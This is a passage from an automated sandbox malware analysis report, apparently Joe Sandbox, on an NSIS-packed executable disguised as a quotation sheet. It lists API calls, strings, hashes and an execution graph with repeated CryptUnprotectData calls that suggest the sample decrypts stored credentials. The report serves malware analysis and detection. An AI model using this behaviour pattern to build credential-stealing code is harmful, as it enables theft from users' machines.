                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: b593fc5a2fd6a4ee5b454699a03de6678a14f4e0c95d94d4c585d04139cbc6e4
                                                                                • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                                                • Opcode Fuzzy Hash: b593fc5a2fd6a4ee5b454699a03de6678a14f4e0c95d94d4c585d04139cbc6e4
                                                                                • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                                                Function 00403AA8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$1033$ldreboligblokkene: Installing
                                                                                • API String ID: 530164218-3840537940
                                                                                • Opcode ID: 574545a4997d909eae1046e12a00ecd62f2fc1531b09d5061d7595ecc4ae8c7e
                                                                                • Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
                                                                                • Opcode Fuzzy Hash: 574545a4997d909eae1046e12a00ecd62f2fc1531b09d5061d7595ecc4ae8c7e
                                                                                • Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58
                                                                                Function 004058D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058DB
                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058E4
                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 004058F5
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004058D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-3355392842
                                                                                • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                • Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
                                                                                • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                • Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE
                                                                                Function 0040596E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                • CharNextA.USER32(00000000), ref: 00405981
                                                                                • CharNextA.USER32(00000000), ref: 00405995
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 0040596F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 3213498283-2551829887
                                                                                • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                • Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
                                                                                • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                                                • Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA
                                                                                Function 004036F1 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000002C4,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403703
                                                                                • CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403717
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F6
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 00403727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 2962429428-2744151807
                                                                                • Opcode ID: 845743e00834e27212fb565fb71f1af62539aea410875136eefd1b85513272db
                                                                                • Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
                                                                                • Opcode Fuzzy Hash: 845743e00834e27212fb565fb71f1af62539aea410875136eefd1b85513272db
                                                                                • Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC
                                                                                Function 004059C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 00405A16
                                                                                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00405A26
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 3248276644-2551829887
                                                                                • Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                                                • Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
                                                                                • Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                                                • Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D
                                                                                Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0040501F
                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                                                  • Part of subcall function 00404094: SendMessageA.USER32(0001041E,00000000,00000000,00000000), ref: 004040A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                                                • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                                                Function 0040591C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405922
                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405930
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-3370423016
                                                                                • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                • Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
                                                                                • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                • Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED
                                                                                Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                                                • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                                                • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

                                                                                Execution Graph

                                                                                Execution Coverage:10.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:5.7%
                                                                                Total number of Nodes:194
                                                                                Total number of Limit Nodes:15
                                                                                execution_graph 46026 37dd52f8 46027 37dd5600 46026->46027 46028 37dd5320 46026->46028 46029 37dd5329 46028->46029 46032 37dd4824 46028->46032 46031 37dd534c 46033 37dd482f 46032->46033 46035 37dd5643 46033->46035 46036 37dd4840 46033->46036 46035->46031 46037 37dd5678 OleInitialize 46036->46037 46038 37dd56dc 46037->46038 46038->46035 46039 37de64d8 46040 37de651e GetCurrentProcess 46039->46040 46042 37de6569 46040->46042 46043 37de6570 GetCurrentThread 46040->46043 46042->46043 46044 37de65ad GetCurrentProcess 46043->46044 46045 37de65a6 46043->46045 46046 37de65e3 46044->46046 46045->46044 46050 37de66a7 46046->46050 46047 37de660b GetCurrentThreadId 46048 37de663c 46047->46048 46051 37de6727 DuplicateHandle 46050->46051 46053 37de66b6 46050->46053 46052 37de67b6 46051->46052 46052->46047 46053->46047 46117 16cee0 46118 16ceec 46117->46118 46128 378411b7 46118->46128 46133 378411c0 46118->46133 46119 16cfa0 46138 37b9b15a 46119->46138 46142 37b9b168 46119->46142 46120 16d0bf 46121 16d11a 46120->46121 46146 37de53d0 46120->46146 46150 37de53c0 46120->46150 46130 378411c0 46128->46130 46129 378415c9 46129->46119 46130->46129 46154 3784b779 46130->46154 46159 3784c302 46130->46159 46135 378411e2 46133->46135 46134 378415c9 46134->46119 46135->46134 46136 3784b779 CryptUnprotectData 46135->46136 46137 3784c302 CryptUnprotectData 46135->46137 46136->46135 46137->46135 46140 37b9b18a 46138->46140 46139 37b9b617 46139->46120 46140->46139 46141 3784b779 CryptUnprotectData 46140->46141 46141->46140 46144 37b9b18a 46142->46144 46143 37b9b617 46143->46120 46144->46143 46145 3784b779 CryptUnprotectData 46144->46145 46145->46144 46147 37de53df 46146->46147 46194 37de4bec 46147->46194 46151 37de53df 46150->46151 46152 37de4bec 3 API calls 46151->46152 46153 37de5400 46152->46153 46153->46121 46155 3784b788 46154->46155 46163 3784bdc8 46155->46163 46172 3784bdba 46155->46172 46156 3784b7f8 46156->46130 46160 3784c2b9 CryptUnprotectData 46159->46160 46162 3784c307 46159->46162 46161 3784c2cc 46160->46161 46161->46130 46162->46130 46164 3784bded 46163->46164 46165 3784bea1 46163->46165 46164->46165 46170 3784bdc8 CryptUnprotectData 46164->46170 46171 3784bdba CryptUnprotectData 46164->46171 46181 3784c077 46164->46181 46186 3784bfa8 46164->46186 46190 3784bbc8 46165->46190 46170->46165 46171->46165 46173 3784bded 46172->46173 46174 3784bea1 46172->46174 46173->46174 46177 3784c077 CryptUnprotectData 46173->46177 46178 3784bfa8 CryptUnprotectData 46173->46178 46179 3784bdc8 CryptUnprotectData 46173->46179 46180 3784bdba CryptUnprotectData 46173->46180 46175 3784bbc8 CryptUnprotectData 46174->46175 46176 3784c06d 46175->46176 46176->46156 46177->46174 46178->46174 46179->46174 46180->46174 46182 3784c07b 46181->46182 46183 3784c02d 46181->46183 46182->46165 46184 3784bbc8 CryptUnprotectData 46183->46184 46185 3784c06d 46184->46185 46185->46165 46187 3784bfbd 46186->46187 46188 3784bbc8 CryptUnprotectData 46187->46188 46189 3784c06d 46188->46189 46189->46165 46191 3784c258 CryptUnprotectData 46190->46191 46193 3784c06d 46191->46193 46193->46156 46195 37de4bf7 46194->46195 46198 37de6354 46195->46198 46197 37de6d86 46197->46197 46199 37de635f 46198->46199 46200 37de7624 46199->46200 46203 37de92b3 46199->46203 46208 37de92c0 46199->46208 46200->46197 46204 37de92bd 46203->46204 46205 37de9305 46204->46205 46213 37de9463 46204->46213 46217 37de9470 46204->46217 46205->46200 46209 37de92e1 46208->46209 46210 37de9305 46209->46210 46211 37de9463 3 API calls 46209->46211 46212 37de9470 3 API calls 46209->46212 46210->46200 46211->46210 46212->46210 46214 37de947d 46213->46214 46216 37de94b6 46214->46216 46221 37de7fa4 46214->46221 46216->46205 46219 37de947d 46217->46219 46218 37de94b6 46218->46205 46219->46218 46220 37de7fa4 3 API calls 46219->46220 46220->46218 46222 37de7faf 46221->46222 46223 37de9528 46222->46223 46225 37de7fd8 46222->46225 46226 37de7fe3 46225->46226 46231 37de7fe8 46226->46231 46228 37de9597 46237 37deec48 46228->46237 46229 37de95d1 46229->46223 46232 37de7ff3 46231->46232 46243 37dea3e0 46232->46243 46234 37dea998 46234->46228 46235 37de92c0 3 API calls 46235->46234 46236 37dea770 46236->46234 46236->46235 46239 37deec79 46237->46239 46240 37deed79 46237->46240 46238 37deec85 46238->46229 46239->46238 46251 37b9faeb 46239->46251 46256 37b9faf0 46239->46256 46240->46229 46244 37dea3eb 46243->46244 46246 37debba1 46244->46246 46247 37dea624 46244->46247 46246->46236 46249 37debd00 FindWindowW 46247->46249 46250 37debd85 46249->46250 46250->46246 46252 37b9fb1b 46251->46252 46253 37b9fbca 46252->46253 46261 37dd0999 46252->46261 46265 37dd09a8 46252->46265 46257 37b9fb1b 46256->46257 46258 37b9fbca 46257->46258 46259 37dd0999 2 API calls 46257->46259 46260 37dd09a8 2 API calls 46257->46260 46259->46258 46260->46258 46263 37dd09ed CreateWindowExW 46261->46263 46264 37dd09f8 